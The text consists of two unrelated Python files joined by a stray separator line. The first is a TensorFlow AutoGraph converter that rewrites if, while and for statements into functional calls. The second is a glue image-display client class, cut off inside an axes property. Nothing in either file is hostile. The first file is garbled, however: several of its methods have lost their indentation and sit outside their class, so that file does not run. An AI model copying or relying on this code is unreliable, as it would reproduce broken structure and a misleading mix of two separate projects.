#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Handles control flow statements: while, for, if."""
import gast
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.lang import directives
from tensorflow.python.autograph.pyct import anno
from tensorflow.python.autograph.pyct import cfg
from tensorflow.python.autograph.pyct import origin_info
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.autograph.pyct import qual_names
from tensorflow.python.autograph.pyct import templates
from tensorflow.python.autograph.pyct.static_analysis import activity
from tensorflow.python.autograph.pyct.static_analysis import annos
from tensorflow.python.autograph.pyct.static_analysis import liveness
from tensorflow.python.autograph.pyct.static_analysis import reaching_definitions
from tensorflow.python.autograph.pyct.static_analysis import reaching_fndefs
class _Function(object):
  """Per-function state tracked while the transformer recurses."""

  # Activity scope of the function currently being visited; set by
  # visit_FunctionDef / visit_Lambda.
  scope = None
class ControlFlowTransformer(converter.Base):
  """Transforms control flow structures like loops and conditionals."""
def visit_Lambda(self, node):
with self.state[_Function] as fn:
fn.scope = anno.getanno(node, anno.Static.SCOPE)
return self.generic_visit(node)
def visit_FunctionDef(self, node):
with self.state[_Function] as fn:
fn.scope = anno.getanno(node, annos.NodeAnno.BODY_SCOPE)
return self.generic_visit(node)
def _create_nonlocal_declarations(self, vars_):
vars_ = set(vars_)
results = []
global_vars = self.state[_Function].scope.globals & vars_
if global_vars:
results.append(gast.Global([str(v) for v in global_vars]))
nonlocal_vars = [
v for v in vars_ if not v.is_composite() and v not in global_vars]
if nonlocal_vars:
results.append(gast.Nonlocal([str(v) for v in nonlocal_vars]))
return results
  def _create_state_functions(
      self, block_vars, nonlocal_declarations, getter_name, setter_name):
    """Creates the getter/setter functions that capture/restore block state.

    The generated `getter_name()` returns a tuple with the current values of
    `block_vars`; `setter_name(vars_)` writes them back (hence the nonlocal
    declarations in its body).
    """
    # No state to track: generate trivial no-op getter/setter.
    if not block_vars:
      template = """
        def getter_name():
          return ()
        def setter_name(block_vars):
          pass
      """
      return templates.replace(
          template, getter_name=getter_name, setter_name=setter_name)

    # Non-simple (composite) vars are wrapped in ag__.ldu so that reading
    # them in the getter does not fail if they are undefined.
    guarded_block_vars = []
    for v in block_vars:
      if v.is_simple():
        guarded_block_vars.append(v)
      else:
        guarded_block_vars.append(
            templates.replace_as_expression(
                'ag__.ldu(lambda: var_, name)',
                var_=v,
                name=gast.Constant(str(v), kind=None)))

    template = """
      def getter_name():
        return guarded_state_vars,
      def setter_name(vars_):
        nonlocal_declarations
        state_vars, = vars_
    """
    return templates.replace(
        template,
        nonlocal_declarations=nonlocal_declarations,
        getter_name=getter_name,
        guarded_state_vars=guarded_block_vars,
        setter_name=setter_name,
        state_vars=tuple(block_vars))
def _create_loop_options(self, node):
if not anno.hasanno(node, anno.Basic.DIRECTIVES):
return gast.Dict([], [])
loop_directives = anno.getanno(node, anno.Basic.DIRECTIVES)
if directives.set_loop_options not in loop_directives:
return gast.Dict([], [])
opts_dict = loop_directives[directives.set_loop_options]
str_keys, values = zip(*opts_dict.items())
keys = [gast.Constant(s, kind=None) for s in str_keys]
values = list(values) # ast and gast don't play well with tuples.
return gast.Dict(keys, values)
def _create_undefined_assigns(self, undefined_symbols):
assignments = []
for s in undefined_symbols:
template = '''
var = ag__.Undefined(symbol_name)
'''
assignments += templates.replace(
template,
var=s,
symbol_name=gast.Constant(s.ssf(), kind=None))
return assignments
def _get_block_basic_vars(self, modified, live_in, live_out):
nonlocals = self.state[_Function].scope.nonlocals
basic_scope_vars = []
for s in modified:
if s.is_composite():
# TODO(mdan): Raise an error when this happens for a TF scope.
continue
# Variables not live into or out of the scope are considered local to the
# scope.
if s in live_in or s in live_out or s in nonlocals:
basic_scope_vars.append(s)
continue
return frozenset(basic_scope_vars)
def _get_block_composite_vars(self, modified, live_in):
# The scope variables corresponding to composite symbols (e.g. `self.x`).
composite_scope_vars = []
for s in modified:
if not s.is_composite():
continue
# Mutations made to objects created inside the scope will appear as writes
# to composite symbols. Because these mutations appear as modifications
# made to composite symbols, we check whether the composite's parent is
# actually live into the scope.
# Example:
# while cond:
# x = Foo()
# x.foo = 2 * x.foo # x.foo is live into the scope, but x is not.
#
# Note that some parents might not be symbols - for example, in x['foo'],
# 'foo' is a parent, but it's a literal, not a symbol. We don't check the
# liveness of literals.
support_set_symbols = tuple(
sss for sss in s.support_set if sss.is_symbol())
if not all(sss in live_in for sss in support_set_symbols):
continue
composite_scope_vars.append(s)
return frozenset(composite_scope_vars)
  def _get_block_vars(self, node, modified):
    """Determines the variables affected inside a control flow statement.

    Returns:
      Tuple of (scope_vars, undefined, nouts): the sorted tuple of affected
      symbols, the tuple of possibly-undefined simple symbols, and the number
      of output variables.
    """
    # Annotations attached by the static analysis passes.
    defined_in = anno.getanno(node, anno.Static.DEFINED_VARS_IN)
    live_in = anno.getanno(node, anno.Static.LIVE_VARS_IN)
    live_out = anno.getanno(node, anno.Static.LIVE_VARS_OUT)
    fn_scope = self.state[_Function].scope

    basic_scope_vars = self._get_block_basic_vars(
        modified,
        live_in,
        live_out)
    composite_scope_vars = self._get_block_composite_vars(modified, live_in)
    scope_vars = tuple(basic_scope_vars | composite_scope_vars)

    # Variables that are modified inside the scope, but not defined
    # before entering it. Only simple variables must be defined. The
    # composite ones will be implicitly checked at runtime.
    possibly_undefined = (
        modified - defined_in - fn_scope.globals - fn_scope.nonlocals)
    undefined = tuple(v for v in possibly_undefined if not v.is_composite())

    # Variables that are modified inside the scope, and depend on values outside
    # it.
    # NOTE: `-` binds tighter than `&`, so this reads as
    # basic_scope_vars & (live_in - live_out).
    input_only = basic_scope_vars & live_in - live_out

    # Place the outputs first, then sort lexicographically.
    scope_vars = sorted(scope_vars, key=lambda v: (v in input_only, v))
    nouts = len(scope_vars) - len(input_only)

    return scope_vars, undefined, nouts
  def visit_If(self, node):
    """Lowers an `if` statement into a functional `ag__.if_stmt` call."""
    node = self.generic_visit(node)
    body_scope = anno.getanno(node, annos.NodeAnno.BODY_SCOPE)
    orelse_scope = anno.getanno(node, annos.NodeAnno.ORELSE_SCOPE)

    # Symbols bound in either branch are the conditional's state.
    cond_vars, undefined, nouts = self._get_block_vars(
        node, body_scope.bound | orelse_scope.bound)

    undefined_assigns = self._create_undefined_assigns(undefined)

    nonlocal_declarations = self._create_nonlocal_declarations(cond_vars)

    # Avoid clashing with any name referenced in either branch.
    reserved = body_scope.referenced | orelse_scope.referenced
    state_getter_name = self.ctx.namer.new_symbol('get_state', reserved)
    state_setter_name = self.ctx.namer.new_symbol('set_state', reserved)
    state_functions = self._create_state_functions(
        cond_vars, nonlocal_declarations, state_getter_name, state_setter_name)

    orelse_body = node.orelse
    if not orelse_body:
      # The generated else function needs a non-empty body.
      orelse_body = [gast.Pass()]

    template = """
      state_functions
      def body_name():
        nonlocal_declarations
        body
      def orelse_name():
        nonlocal_declarations
        orelse
      undefined_assigns
      ag__.if_stmt(
        test,
        body_name,
        orelse_name,
        state_getter_name,
        state_setter_name,
        (symbol_names,),
        nouts)
    """
    new_nodes = templates.replace(
        template,
        body=node.body,
        body_name=self.ctx.namer.new_symbol('if_body', reserved),
        orelse=orelse_body,
        orelse_name=self.ctx.namer.new_symbol('else_body', reserved),
        nonlocal_declarations=nonlocal_declarations,
        nouts=gast.Constant(nouts, kind=None),
        state_functions=state_functions,
        state_getter_name=state_getter_name,
        state_setter_name=state_setter_name,
        symbol_names=tuple(gast.Constant(str(s), kind=None) for s in cond_vars),
        test=node.test,
        undefined_assigns=undefined_assigns)
    # Preserve source mapping on the replacement call for error reporting.
    origin_info.copy_origin(node, new_nodes[-1])
    return new_nodes
  def visit_While(self, node):
    """Lowers a `while` loop into a functional `ag__.while_stmt` call."""
    node = self.generic_visit(node)
    body_scope = anno.getanno(node, annos.NodeAnno.BODY_SCOPE)

    # Symbols bound in the loop body are the loop's state.
    loop_vars, undefined, _ = self._get_block_vars(node, body_scope.bound)

    undefined_assigns = self._create_undefined_assigns(undefined)

    nonlocal_declarations = self._create_nonlocal_declarations(loop_vars)

    reserved = body_scope.referenced
    state_getter_name = self.ctx.namer.new_symbol('get_state', reserved)
    state_setter_name = self.ctx.namer.new_symbol('set_state', reserved)
    state_functions = self._create_state_functions(
        loop_vars, nonlocal_declarations, state_getter_name, state_setter_name)

    # Options set via directives.set_loop_options inside the loop body.
    opts = self._create_loop_options(node)

    template = """
      state_functions
      def body_name():
        nonlocal_declarations
        body
      def test_name():
        return test
      undefined_assigns
      ag__.while_stmt(
        test_name,
        body_name,
        state_getter_name,
        state_setter_name,
        (symbol_names,),
        opts)
    """
    new_nodes = templates.replace(
        template,
        body=node.body,
        body_name=self.ctx.namer.new_symbol('loop_body', reserved),
        nonlocal_declarations=nonlocal_declarations,
        opts=opts,
        state_functions=state_functions,
        state_getter_name=state_getter_name,
        state_setter_name=state_setter_name,
        symbol_names=tuple(gast.Constant(str(s), kind=None) for s in loop_vars),
        test=node.test,
        test_name=self.ctx.namer.new_symbol('loop_test', reserved),
        undefined_assigns=undefined_assigns)
    # Preserve source mapping on the replacement call for error reporting.
    origin_info.copy_origin(node, new_nodes[-1])
    return new_nodes
  def visit_For(self, node):
    """Lowers a `for` statement into a functional `ag__.for_stmt` call.

    Mirrors `visit_While`, with two extras: the loop body takes the current
    iterate as an argument (expanded into the original loop target), and an
    optional `extra_test` function supports early termination (e.g. `break`
    lowered by an earlier pass).
    """
    node = self.generic_visit(node)
    body_scope = anno.getanno(node, annos.NodeAnno.BODY_SCOPE)
    iter_scope = anno.getanno(node, annos.NodeAnno.ITERATE_SCOPE)
    # State includes variables bound by the body and by the iterate target.
    loop_vars, undefined, _ = self._get_block_vars(
        node, body_scope.bound | iter_scope.bound)
    undefined_assigns = self._create_undefined_assigns(undefined)
    nonlocal_declarations = self._create_nonlocal_declarations(loop_vars)
    reserved = body_scope.referenced | iter_scope.referenced
    state_getter_name = self.ctx.namer.new_symbol('get_state', reserved)
    state_setter_name = self.ctx.namer.new_symbol('set_state', reserved)
    state_functions = self._create_state_functions(
        loop_vars, nonlocal_declarations, state_getter_name, state_setter_name)
    opts = self._create_loop_options(node)
    # Record the source-level names of the iterates for diagnostics.
    opts.keys.append(gast.Constant('iterate_names', kind=None))
    opts.values.append(gast.Constant(
        parser.unparse(node.target, include_encoding_marker=False), kind=None))
    if anno.hasanno(node, anno.Basic.EXTRA_LOOP_TEST):
      extra_test = anno.getanno(node, anno.Basic.EXTRA_LOOP_TEST)
      extra_test_name = self.ctx.namer.new_symbol(
          'extra_test', reserved)
      template = """
        def extra_test_name():
          nonlocal_declarations
          return extra_test_expr
      """
      extra_test_function = templates.replace(
          template,
          extra_test_expr=extra_test,
          extra_test_name=extra_test_name,
          loop_vars=loop_vars,
          nonlocal_declarations=nonlocal_declarations)
    else:
      # No extra test: pass a literal `None` to `for_stmt`.
      extra_test_name = parser.parse_expression('None')
      extra_test_function = []

    # iterate_arg_name holds a single arg with the iterates, which may be a
    # tuple.
    iterate_arg_name = self.ctx.namer.new_symbol('itr', reserved)
    template = """
      iterates = iterate_arg_name
    """
    iterate_expansion = templates.replace(
        template, iterate_arg_name=iterate_arg_name, iterates=node.target)
    origin_info.copy_origin(node, iterate_expansion)

    template = """
      state_functions
      def body_name(iterate_arg_name):
        nonlocal_declarations
        iterate_expansion
        body
      extra_test_function
      undefined_assigns
      ag__.for_stmt(
          iterated,
          extra_test_name,
          body_name,
          state_getter_name,
          state_setter_name,
          (symbol_names,),
          opts)
    """
    new_nodes = templates.replace(
        template,
        body=node.body,
        body_name=self.ctx.namer.new_symbol('loop_body', reserved),
        extra_test_function=extra_test_function,
        extra_test_name=extra_test_name,
        iterate_arg_name=iterate_arg_name,
        iterate_expansion=iterate_expansion,
        iterated=node.iter,
        nonlocal_declarations=nonlocal_declarations,
        opts=opts,
        symbol_names=tuple(gast.Constant(str(s), kind=None) for s in loop_vars),
        state_functions=state_functions,
        state_getter_name=state_getter_name,
        state_setter_name=state_setter_name,
        undefined_assigns=undefined_assigns)
    origin_info.copy_origin(node, new_nodes[-1])
    return new_nodes
class AnnotatedDef(reaching_definitions.Definition):
  """A reaching definition that additionally carries compiler directives."""

  def __init__(self):
    super(AnnotatedDef, self).__init__()
    # Maps directive callables to their keyword arguments.
    self.directives = {}
def transform(node, ctx):
  """Rewrites all control flow constructs in `node` into functional form.

  Runs the prerequisite static analyses (CFG, qualified names, activity,
  reaching definitions/function definitions, liveness) and then applies the
  ControlFlowTransformer.
  """
  graphs = cfg.build(node)
  node = qual_names.resolve(node)
  node = activity.resolve(node, ctx, None)
  # Graph-based analyses share the CFGs built above.
  for analyzer in (reaching_definitions, reaching_fndefs, liveness):
    node = analyzer.resolve(node, ctx, graphs)
  return ControlFlowTransformer(ctx).visit(node)
| |
from __future__ import absolute_import, division, print_function
import logging
from functools import wraps
import numpy as np
from ..external.modest_image import extract_matched_slices
from ..core.exceptions import IncompatibleAttribute
from ..core.data import Data
from ..core.subset import Subset, RoiSubsetState
from ..core.roi import PolygonalROI
from ..core.message import ComponentReplacedMessage
from ..core.callback_property import (
callback_property, CallbackProperty)
from ..core.edit_subset_mode import EditSubsetMode
from ..utils import lookup_class, defer_draw
from .viz_client import VizClient, init_mpl
from .layer_artist import (ScatterLayerArtist, LayerArtistContainer,
ImageLayerArtist, SubsetImageLayerArtist,
RGBImageLayerArtist,
ImageLayerBase, RGBImageLayerBase,
SubsetImageLayerBase, ScatterLayerBase)
def requires_data(func):
    """Decorator that checks an ImageClient for a non-null display_data
    attribute. Only executes decorated function if present"""
    @wraps(func)
    def wrapper(*args, **kwargs):
        client = args[0]
        if client.display_data is None:
            # Nothing to display: silently skip the wrapped call.
            return None
        return func(*args, **kwargs)
    return wrapper
class ImageClient(VizClient):
    """Backend-agnostic client that renders 2D slices through ND data.

    Subclasses provide the concrete artist factories and redraw logic
    (see the NotImplementedError methods at the bottom of the class).
    """

    # Currently displayed Data object and the ComponentID being shown.
    display_data = CallbackProperty(None)
    display_attribute = CallbackProperty(None)

    def __init__(self, data, artist_container=None):
        VizClient.__init__(self, data)

        self.artists = artist_container
        if self.artists is None:
            self.artists = LayerArtistContainer()

        # slice through ND cube
        # ('y', 'x', 2)
        # means current data slice is [:, :, 2], and axis=0 is vertical on plot
        self._slice = None

        # how to extract a downsampled/cropped 2D image to plot
        # (ComponentID, slice, slice, ...)
        self._view = None

        # cropped/downsampled image
        # self._image == self.display_data[self._view]
        self._image = None

        # if this is set, render this instead of self._image
        self._override_image = None

        # maps attributes -> normalization settings
        self._norm_cache = {}

    def point_details(self, x, y):
        """Return a dict of labels/pix/world/value info for plot position (x, y)."""
        if self.display_data is None:
            return dict(labels=['x=%s' % x, 'y=%s' % y],
                        pix=(x, y), world=(x, y), value=np.nan)

        data = self.display_data
        pix = self._pixel_coords(x, y)
        labels = self.coordinate_labels(pix)
        world = data.coords.pixel2world(*pix[::-1])
        world = world[::-1]   # reverse for numpy convention

        view = []
        for p, s in zip(pix, data.shape):
            p = int(p)
            if not (0 <= p < s):
                # Position is outside the data; no value to report.
                value = None
                break
            view.append(slice(p, p + 1))
        else:
            # Loop completed without break: position is inside the data.
            if self._override_image is None:
                value = self.display_data[self.display_attribute, view]
            else:
                value = self._override_image[int(y), int(x)]
            value = value.ravel()[0]

        return dict(pix=pix, world=world, labels=labels, value=value)

    def coordinate_labels(self, pix):
        """ Return human-readable labels for a position in pixel coords

        :param pix: tuple of ints
                    Pixel coordinate of point in the data

        :returns: List of strings, one for each coordinate axis, of the
                  form "axis_label_name=world_coordinate_value"

        :note: pix describes a position in the *data*, not necessarily
               the image display
        """
        data = self.display_data
        if data is None:
            return []

        world = data.coords.pixel2world(*pix[::-1])
        world = world[::-1]   # reverse for numpy convention

        labels = ['%s=%s' % (data.get_world_component_id(i).label, w)
                  for i, w in enumerate(world)]
        return labels

    @callback_property
    def slice(self):
        """
        Returns a tuple describing the current slice through the data

        The tuple has length equal to the dimensionality of the display
        data. Each entry is either:

        'x' if the dimension is mapped to the X image axis
        'y' if the dimension is mapped to the Y image axis
        a number, indicating which fixed slice the dimension is restricted to
        """
        if self._slice is not None:
            return self._slice

        if self.display_data is None:
            return tuple()
        ndim = self.display_data.ndim
        if ndim == 1:
            self._slice = ('x',)
        elif ndim == 2:
            self._slice = ('y', 'x')
        else:
            # Higher dimensions pinned to index 0, last two shown as image.
            self._slice = (0,) * (ndim - 2) + ('y', 'x')

        return self._slice

    @slice.setter
    @defer_draw
    def slice(self, value):
        if self.slice == tuple(value):
            return

        if value == tuple():
            return

        # Only relimit if the x/y axes moved to different data dimensions.
        relim = value.index('x') != self._slice.index('x') or \
            value.index('y') != self._slice.index('y')

        self._slice = tuple(value)
        self._clear_override()
        self._update_axis_labels()
        self._update_data_plot(relim=relim)
        self._update_subset_plots()
        self._update_scatter_plots()
        self._redraw()

    @property
    def is_3D(self):
        """
        Returns True if the display data has 3 dimensions """
        if not self.display_data:
            return False
        return len(self.display_data.shape) == 3

    @property
    def slice_ind(self):
        """
        For 3D data, returns the pixel index of the current slice.
        Otherwise, returns None
        """
        if self.is_3D:
            for s in self.slice:
                if s not in ['x', 'y']:
                    return s
        return None

    @property
    def image(self):
        # The currently-extracted (cropped/downsampled) 2D image.
        return self._image

    @requires_data
    def override_image(self, image):
        """Temporarily override the current slice view with another
        image (i.e., an aggregate)
        """
        self._override_image = image
        for a in self.artists[self.display_data]:
            if isinstance(a, ImageLayerBase):
                a.override_image(image)
        self._update_data_plot()
        self._redraw()

    def _clear_override(self):
        # Drop any override image and restore normal slice rendering.
        self._override_image = None
        for a in self.artists[self.display_data]:
            if isinstance(a, ImageLayerBase):
                a.clear_override()

    @slice_ind.setter
    @defer_draw
    def slice_ind(self, value):
        if self.is_3D:
            # Replace the single numeric entry of the slice with `value`.
            slc = [s if s in ['x', 'y'] else value for s in self.slice]
            self.slice = slc
            self._update_data_plot()
            self._update_subset_plots()
            self._update_scatter_plots()
            self._redraw()
        else:
            raise IndexError("Can only set slice_ind for 3D images")

    def can_image_data(self, data):
        # Only >=2D data can be shown as an image.
        return data.ndim > 1

    def _ensure_data_present(self, data):
        if data not in self.artists:
            self.add_layer(data)

    @defer_draw
    def set_data(self, data, attribute=None):
        """Make `data` the displayed dataset, optionally selecting `attribute`."""
        if not self.can_image_data(data):
            return

        self._ensure_data_present(data)
        self._slice = None

        attribute = attribute or _default_component(data)

        self.display_data = data
        self.display_attribute = attribute
        self._update_axis_labels()
        self._update_data_plot(relim=True)
        self._update_subset_plots()
        self._update_scatter_plots()
        self._redraw()

    def set_attribute(self, attribute):
        """Switch the displayed ComponentID, caching normalization per attribute.

        :raises IncompatibleAttribute: if `attribute` is not in the display data.
        """
        if not self.display_data or \
                attribute not in self.display_data.component_ids():
            raise IncompatibleAttribute(
                "Attribute not in data's attributes: %s" % attribute)
        if self.display_attribute is not None:
            self._norm_cache[self.display_attribute] = self.get_norm()

        self.display_attribute = attribute

        if attribute in self._norm_cache:
            self.set_norm(norm=self._norm_cache[attribute])
        else:
            self.clear_norm()

        self._update_data_plot()
        self._redraw()

    def _redraw(self):
        """
        Re-render the screen
        """
        pass

    @requires_data
    @defer_draw
    def set_norm(self, **kwargs):
        for a in self.artists[self.display_data]:
            a.set_norm(**kwargs)
        self._update_data_plot()
        self._redraw()

    @requires_data
    def clear_norm(self):
        for a in self.artists[self.display_data]:
            a.clear_norm()

    @requires_data
    def get_norm(self):
        a = self.artists[self.display_data][0]
        return a.norm

    @requires_data
    @defer_draw
    def set_cmap(self, cmap):
        for a in self.artists[self.display_data]:
            a.cmap = cmap
            a.redraw()

    def _build_view(self):
        # Build a (attribute, slice, slice, ...) view into the full cube;
        # subclasses may downsample (see MplImageClient._build_view).
        att = self.display_attribute
        shp = self.display_data.shape
        x, y = np.s_[:], np.s_[:]
        slc = list(self.slice)
        slc[slc.index('x')] = x
        slc[slc.index('y')] = y
        return (att,) + tuple(slc)

    @requires_data
    def _numerical_data_changed(self, message):
        data = message.sender
        self._update_data_plot(force=True)
        self._update_scatter_layer(data)
        for s in data.subsets:
            self._update_subset_single(s, force=True)
        self._redraw()

    @requires_data
    def _update_data_plot(self, relim=False, force=False):
        """
        Re-sync the main image and its subsets
        """

        if relim:
            self.relim()

        view = self._build_view()
        self._image = self.display_data[view]
        transpose = self.slice.index('x') < self.slice.index('y')

        self._view = view
        for a in list(self.artists):
            if (not isinstance(a, ScatterLayerBase)) and \
                    a.layer.data is not self.display_data:
                # Drop image artists whose data is no longer displayed.
                self.artists.remove(a)
            else:
                a.update(view, transpose)
        for a in self.artists[self.display_data]:
            meth = a.update if not force else a.force_update
            meth(view, transpose=transpose)

    def _update_subset_single(self, s, redraw=False, force=False):
        """
        Update the location and visual properties
        of each point in a single subset

        Parameters
        ----------
        s : Subset instance
            The subset to refresh.
        """
        logging.getLogger(__name__).debug("update subset single: %s", s)

        if s not in self.artists:
            return

        self._update_scatter_layer(s)

        if s.data is not self.display_data:
            return

        view = self._build_view()
        transpose = self.slice.index('x') < self.slice.index('y')
        for a in self.artists[s]:
            meth = a.update if not force else a.force_update
            meth(view, transpose)

        if redraw:
            self._redraw()

    @property
    def _slice_ori(self):
        # Index of the data dimension currently pinned (3D only).
        if not self.is_3D:
            return None
        for i, s in enumerate(self.slice):
            if s not in ['x', 'y']:
                return i

    @requires_data
    @defer_draw
    def apply_roi(self, roi):
        """Convert an ROI into a subset state and apply it via the edit mode."""
        subset_state = RoiSubsetState()
        xroi, yroi = roi.to_polygon()
        x, y = self._get_plot_attributes()
        subset_state.xatt = x
        subset_state.yatt = y
        subset_state.roi = PolygonalROI(xroi, yroi)
        mode = EditSubsetMode()
        mode.update(self.data, subset_state, focus_data=self.display_data)

    def _remove_subset(self, message):
        self.delete_layer(message.sender)

    def delete_layer(self, layer):
        """Remove `layer` (and, for Data, its subsets) from the display."""
        if layer not in self.artists:
            return
        for a in self.artists.pop(layer):
            a.clear()

        if isinstance(layer, Data):
            for subset in layer.subsets:
                self.delete_layer(subset)

        if layer is self.display_data:
            # Fall back to another layer, or clear the display entirely.
            if len(self.artists) > 0:
                self.display_data = self.artists.layers[0].data
            else:
                self.display_data = None

        self._redraw()

    def _remove_data(self, message):
        self.delete_layer(message.data)
        for s in message.data.subsets:
            self.delete_layer(s)

    def init_layer(self, layer):
        # only auto-add subsets if they are of the main image
        if isinstance(layer, Subset) and layer.data is not self.display_data:
            return
        self.add_layer(layer)

    def rgb_mode(self, enable=None):
        """ Query whether RGB mode is enabled, or toggle RGB mode

        :param enable: bool, or None
                       If True or False, explicitly enable/disable RGB mode.
                       If None, check if RGB mode is enabled

        :rtype: LayerArtist or None
           If RGB mode is enabled, returns an RGBImageLayerBase
           If enable=False, return the new ImageLayerArtist
        """
        # XXX need to better handle case where two RGBImageLayerArtists
        # are created

        if enable is None:
            for a in self.artists:
                if isinstance(a, RGBImageLayerBase):
                    return a
            return None

        result = None
        layer = self.display_data
        if enable:
            layer = self.display_data
            a = self._new_rgb_layer(layer)
            if a is None:
                return
            a.r = a.g = a.b = self.display_attribute

            with self.artists.ignore_empty():
                self.artists.pop(layer)
                self.artists.append(a)
            result = a
        else:
            with self.artists.ignore_empty():
                for artist in list(self.artists):
                    if isinstance(artist, RGBImageLayerBase):
                        self.artists.remove(artist)
                result = self.add_layer(layer)

        self._update_data_plot()
        self._redraw()
        return result

    def add_layer(self, layer):
        """Add a Data or Subset layer; returns the created artist (or None)."""
        if layer in self.artists:
            return self.artists[layer][0]

        if layer.data not in self.data:
            raise TypeError("Data not managed by client's data collection")

        if not self.can_image_data(layer.data):
            # if data is 1D, try to scatter plot
            if len(layer.data.shape) == 1:
                return self.add_scatter_layer(layer)
            logging.getLogger(__name__).warning(
                "Cannot visualize %s. Aborting", layer.label)
            return

        if isinstance(layer, Data):
            result = self._new_image_layer(layer)
            self.artists.append(result)
            for s in layer.subsets:
                self.add_layer(s)
            self.set_data(layer)
        elif isinstance(layer, Subset):
            result = self._new_subset_image_layer(layer)
            self.artists.append(result)
            self._update_subset_single(layer)
        else:
            raise TypeError("Unrecognized layer type: %s" % type(layer))

        return result

    def add_scatter_layer(self, layer):
        logging.getLogger(
            __name__).debug('Adding scatter layer for %s' % layer)
        if layer in self.artists:
            logging.getLogger(__name__).debug('Layer already present')
            return

        result = self._new_scatter_layer(layer)
        self.artists.append(result)
        self._update_scatter_layer(layer)
        return result

    def _update_scatter_plots(self):
        for layer in self.artists.layers:
            self._update_scatter_layer(layer)

    @requires_data
    def _update_scatter_layer(self, layer, force=False):
        """Sync scatter artists for `layer` with the current slice/axes."""
        if layer not in self.artists:
            return

        xatt, yatt = self._get_plot_attributes()
        need_redraw = False

        for a in self.artists[layer]:
            if not isinstance(a, ScatterLayerBase):
                continue
            need_redraw = True
            a.xatt = xatt
            a.yatt = yatt
            if self.is_3D:
                # Emphasize points lying within the current 3D slab.
                zatt = self.display_data.get_pixel_component_id(
                    self._slice_ori)
                subset = (
                    zatt > self.slice_ind) & (zatt <= self.slice_ind + 1)
                a.emphasis = subset
            else:
                a.emphasis = None
            a.update() if not force else a.force_update()
            a.redraw()

        if need_redraw:
            self._redraw()

    @requires_data
    def _get_plot_attributes(self):
        # Pixel ComponentIDs mapped to the image x and y axes.
        x, y = _slice_axis(self.display_data.shape, self.slice)
        ids = self.display_data.pixel_component_ids
        return ids[x], ids[y]

    def _pixel_coords(self, x, y):
        """From a slice coordinate (x,y), return the full (possibly
        >2D) numpy index into the full data

        *Note*
        The inputs to this function are the reverse of numpy convention
        (horizontal axis first, then vertical)

        *Returns*
        Either (x,y) or (x,y,z)
        """
        result = list(self.slice)
        result[result.index('x')] = x
        result[result.index('y')] = y
        return result

    def is_visible(self, layer):
        return all(a.visible for a in self.artists[layer])

    def set_visible(self, layer, state):
        for a in self.artists[layer]:
            a.visible = state

    def set_slice_ori(self, ori):
        """Choose which data axis (0, 1, or 2) is pinned for a 3D cube."""
        if not self.is_3D:
            raise IndexError("Can only set slice_ori for 3D images")
        if ori == 0:
            self.slice = (0, 'y', 'x')
        elif ori == 1:
            self.slice = ('y', 0, 'x')
        elif ori == 2:
            self.slice = ('y', 'x', 0)
        else:
            raise ValueError("Orientation must be 0, 1, or 2")

    def restore_layers(self, layers, context):
        """ Restore a list of glue-serialized layer dicts """
        for layer in layers:
            c = lookup_class(layer.pop('_type'))
            props = dict((k, v if k == 'stretch' else context.object(v))
                         for k, v in layer.items())
            l = props['layer']
            if issubclass(c, ScatterLayerBase):
                l = self.add_scatter_layer(l)
            elif issubclass(c, RGBImageLayerBase):
                r = props.pop('r')
                g = props.pop('g')
                b = props.pop('b')
                self.display_data = l
                self.display_attribute = r
                l = self.rgb_mode(True)
                l.r = r
                l.g = g
                l.b = b
            elif issubclass(c, (ImageLayerBase, SubsetImageLayerBase)):
                if isinstance(l, Data):
                    self.set_data(l)
                l = self.add_layer(l)
            else:
                raise ValueError("Cannot restore layer of type %s" % l)
            l.properties = props

    def _on_component_replace(self, msg):
        # Track component replacement so the display stays valid.
        if self.display_attribute is msg.old:
            self.display_attribute = msg.new

    def register_to_hub(self, hub):
        super(ImageClient, self).register_to_hub(hub)
        hub.subscribe(self,
                      ComponentReplacedMessage,
                      self._on_component_replace)

    # subclasses should override the following methods as appropriate

    def _new_rgb_layer(self, layer):
        """
        Construct and return an RGBImageLayerBase for the given layer

        Parameters
        ----------
        layer : Data or Subset instance
            Which object to visualize
        """
        raise NotImplementedError()

    def _new_subset_image_layer(self, layer):
        """
        Construct and return a SubsetImageLayerArtist for the given layer

        Parameters
        ----------
        layer : Data or Subset instance
            Which object to visualize
        """
        raise NotImplementedError()

    def _new_image_layer(self, layer):
        """
        Construct and return an ImageLayerArtist for the given layer

        Parameters
        ----------
        layer : Data or Subset instance
            Which object to visualize
        """
        raise NotImplementedError()

    def _new_scatter_layer(self, layer):
        """
        Construct and return a ScatterLayerArtist for the given layer

        Parameters
        ----------
        layer : Data or Subset instance
            Which object to visualize
        """
        raise NotImplementedError()

    def _update_axis_labels(self):
        """
        Sync the displays for labels on X/Y axes, because
        the data or slice has changed
        """
        raise NotImplementedError()

    def relim(self):
        """
        Reset view window to the default pan/zoom setting.
        """
        pass

    def show_crosshairs(self, x, y):
        pass

    def clear_crosshairs(self):
        pass
class MplImageClient(ImageClient):
    """Matplotlib-backed ImageClient: draws into a matplotlib figure/axes."""

    def __init__(self, data, figure=None, axes=None, artist_container=None):
        super(MplImageClient, self).__init__(data, artist_container)
        if axes is not None:
            raise ValueError("ImageClient does not accept an axes")
        self._setup_mpl(figure, axes)

        # description of field of view and center of image
        self._view_window = None

        # artist for a crosshair
        self._crosshairs = None

    def _setup_mpl(self, figure, axes):
        # Create (or adopt) the figure/axes; WCS-aware axes when possible.
        figure, axes = init_mpl(figure, axes, wcs=True)
        self._axes = axes
        self._axes.get_xaxis().set_ticks([])
        self._axes.get_yaxis().set_ticks([])
        self._figure = figure

        # custom axes formatter
        def format_coord(x, y):
            data = self.display_data
            if data is None:
                # MPL default method
                return type(self._axes).format_coord(self._axes, x, y)
            info = self.point_details(x, y)
            return ' '.join(info['labels'])

        self._axes.format_coord = format_coord

        # Re-check resampling after pan/zoom interactions.
        self._cid = self._axes.figure.canvas.mpl_connect('button_release_event',
                                                         self.check_update)

        if hasattr(self._axes.figure.canvas, 'homeButton'):
            # test code doesn't always use Glue's custom FigureCanvas
            self._axes.figure.canvas.homeButton.connect(self.check_update)

    @property
    def axes(self):
